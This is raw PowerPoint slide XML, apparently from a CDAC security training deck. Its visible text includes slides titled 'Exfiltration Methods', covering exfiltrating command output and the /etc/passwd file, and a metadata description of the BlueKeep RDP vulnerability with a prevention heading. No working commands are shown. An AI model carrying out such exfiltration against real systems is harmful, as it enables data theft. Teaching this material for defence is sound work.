        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63437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623C73C-F452-D05A-6A63-4E4308193E56}"/>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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5403BF0D-E84A-1358-0F6C-A53A7F813277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="5338" r="51816" b="12451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2423592" y="2149988"/>
            <a:ext cx="7488832" cy="3888376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED6B5F8D-048C-A360-70A2-0CCE2343E2C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6168008" y="4941168"/>
            <a:ext cx="679450" cy="146050"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 116304"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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EF9F5CEE-94EA-32B0-86F8-A6660BD54D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3656366" y="860495"/>
            <a:ext cx="4239834" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exfiltration Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{932F9867-E67E-B901-EF7A-B043172DD447}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3111987" y="1578591"/>
            <a:ext cx="6112042" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Method 1: Exfiltrating the Output of a Command</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427975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145AAC-D66C-677E-434F-7043A0EA9A4D}"/>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3073" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D11A726-0531-984A-6E27-713E4EC30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9489" t="8694" b="17577"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2135560" y="1412776"/>
            <a:ext cx="8398532" cy="446449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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975E33FD-2A66-546A-DDAD-AAF04D80E25F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5835048" y="4653136"/>
            <a:ext cx="864096" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 116304"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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3457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1B23AD-2E3D-0357-0525-C5CB95A3B324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copyright © 2024                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed and Developed by CDAC </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC09E38B-964A-B234-56EE-2DE8729F619B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-1" t="10988" r="53717" b="-627"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2495600" y="1700808"/>
            <a:ext cx="7465489" cy="4002118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5278E68-5067-3CE3-C689-8A4F1001B07A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7349457" y="4725144"/>
            <a:ext cx="676943" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 116304"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFC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E52E6900-95DA-9265-DD6D-3BC7271220BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359696" y="916660"/>
            <a:ext cx="6112042" cy="496931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Method 2: Exfiltrating the /etc/passwd File</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" kern="1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7855082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27477</TotalTime>
  <Words>3272</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>225</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Brush Script MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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PREVENTION FROM THE ATTACK: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Bluekeep is a critical Remote Code Execution vulnerability in Microsoft’s RDP service running on tcp port 3389. It could allow an attacker to execute remote code on a vulnerable machine that’s running Remote Desktop Protocol (RDP). As the vulnerability is wormable, it spread rapidly. By sending a specially crafted packet an attacker is able to set the value for the Channel ID to something the RDP service isn't expecting, this causes a memory corruption bug that will create the conditions for Remote Code Execution to occur.</dc:title>
  <dc:creator>cdac</dc:creator>
  <cp:lastModifiedBy>Y. Laxmi</cp:lastModifiedBy>
  <cp:revision>476</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-15T00:05:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-01T08:24:21Z</dcterms:modified>
</cp:coreProperties>
</file>